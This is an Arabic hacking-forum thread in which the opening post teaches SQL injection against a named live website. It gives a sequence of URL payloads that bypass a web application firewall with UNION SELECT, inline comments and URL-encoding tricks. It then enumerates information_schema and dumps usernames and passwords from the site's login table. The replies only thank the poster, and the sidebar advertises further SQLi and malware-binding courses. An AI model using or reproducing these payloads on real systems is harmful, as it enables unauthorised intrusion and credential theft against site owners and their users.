1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

تخطي الفوربدين 403 + الفلترة بطريقة احترافية

الموضوع في 'المواضيع المُكرّرة والمُخالفة' بواسطة AsSad HOmS, بتاريخ ‏19 أكتوبر 2014.

كاتب الموضوع : AsSad HOmS المشاهدات : 363 الردود : 6 ‏19 أكتوبر 2014
حالة الموضوع:
مغلق
  1. غير متصل

    AsSad HOmS
    rank
    V • I • P

    عضو منذ:
    ‏15 مارس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:

    بسم الله الرحمن الرحيم

    بعض مشكلة الفلترة والفوربدين تواجه هكرز في اختراق المواقع انشالله اليوم معنا حل كل هالامور مع شرح بسيط

    معنا هدا الموقع خلينا نجرب أستخراج عدد الاعمدة راح يعطينا فوربدين

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=3

    التخطي راح يكون بالأمر التالي

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=3+group+by+1
    تمام هيك تخطينا الفوربدين

    عدد الاعدمة 3 اوك لهون شباب

    بدنا نطالع الجدوال

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=3+union+select+1,2,3
    عطنا الموقع ((Not Acceptable))

    اذا حاولنا وتخطينا بالطريقة العادية الفلترة

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=3+union+/*!select*/+1,2,3
    كود:
    http://wonderlandthemepark.com/showpage.php?pid=3+union+/*!12345select*/+1,2,3
    راح ناخد فوربدين هون انت راح تشد شعر راسك بس بسيطة

    حل بسيط معنا هادا الجدول بيعطنا كل حرف بالمقابل تخطي بالرموز

    [​IMG]

    راخ نشفير هدول :U = %55 T = %54

    الأمر بصير ((( +%55nion+/*!12345selec%54*/+1,2,3)))

    تمام منشوف الموقع

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=3+Union+/*!12345selecT*/+1,2,3
    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,3
    اشتغل منكمل حقن شباب

    منطالع اصدار القاعدة

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,version()
    طلع معنا فوربدين بعدين مع هل الحالة

    راح نتخطي بهل الطريقة

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,@@version
    طلع معنا ((Not Acceptable))

    التخطي راح يكون

    بالامر

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,@@GLOBAL.VERSION
    تمام طللع معنا الأصدار

    ((5.1.73-cll))

    هلأ بدنا نطالع table_name

    أمر استخراج

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,/*!12345table_name*/+from+information_schema./*!12345tables*/+limit+0,1
    خلينا نطالع اليوزر والباس شوفوا شو طلع معنا

    اليوز

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,/*!12345column_name*/+from+information_schema./*!12345columns*/+where+/*!12345table_name*/=0x6c6f67696e+limit+1,1
    الباس

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,/*!12345column_name*/+from+information_schema./*!12345columns*/+where+/*!12345table_name*/=0x6c6f67696e+limit+2,1
    طبعا لازم نتخطي الفلترة

    أمر استخراج اليوز
    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,user+from+login
    الباس

    كود:
    http://wonderlandthemepark.com/showpage.php?pid=-3+Union+/*!12345selecT*/+1,2,pass+from+login

    لهون انشالله الدرس حلوة ومفيد
     


    جاري تحميل الصفحة...
  2. غير متصل

    تــــركــــي
    DeveloPer Plus

    عضو منذ:
    ‏25 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تخطي الفوربدين 403 + الفلترة بطريقة احترافية

    يعطيك العافية وسلمت يداك ً:ُeُe6#:
     


  3. غير متصل

    كاسر قلوب الهكر
    Developer

    عضو منذ:
    ‏20 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تخطي الفوربدين 403 + الفلترة بطريقة احترافية

    بارك الله فيك أخي[​IMG]رااااائع[​IMG]
     


  4. غير متصل

    GO HacKer
    DeveloPer Plus

    عضو منذ:
    ‏16 يوليو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: تخطي الفوربدين 403 + الفلترة بطريقة احترافية

    يعطيك العافيةة ..
    اخوي....
     


  5. غير متصل

    jőŐőķєя
    rankrank
    Developer

    عضو منذ:
    ‏9 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    طآلب , ثآنوي ..●
    الإقامة:

    رد: تخطي الفوربدين 403 + الفلترة بطريقة احترافية

    يعطيك العآفية ..
     


  6. غير متصل

    VB_Dev
    rank
    Developer

    عضو منذ:
    ‏21 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: تخطي الفوربدين 403 + الفلترة بطريقة احترافية

    مشكووووووور ياغالي

    طرح رائع
     


  7. غير متصل

    Ghost Libya
    rankrank
    Developer

    عضو منذ:
    ‏17 ابريل 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تخطي الفوربدين 403 + الفلترة بطريقة احترافية

    يعطيك العافية أخوي شرح ولا أروع
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...